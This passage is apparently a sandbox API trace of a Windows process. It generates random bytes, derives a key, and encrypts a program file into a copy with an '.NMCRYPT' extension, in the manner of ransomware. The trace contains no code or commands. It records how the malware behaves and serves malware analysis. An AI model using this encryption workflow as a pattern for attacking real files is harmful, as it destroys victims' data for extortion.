(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.655] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.656] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.657] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.657] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.657] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0166.657] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.657] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad238) returned 1 [0166.658] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.658] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.658] wcslen (_String="\\\\?\\") returned 0x4 [0166.658] CryptDuplicateKey (in: hKey=0x9ad238, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0166.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.658] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=22680) returned 1 [0166.658] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.659] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.773] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.774] GetLastError () returned 0x0 [0166.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.790] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.790] GetLastError () returned 0x0 [0166.790] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.790] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.790] GetLastError () returned 0x0 [0166.790] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.790] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.790] GetLastError () returned 0x0 [0166.790] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.790] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 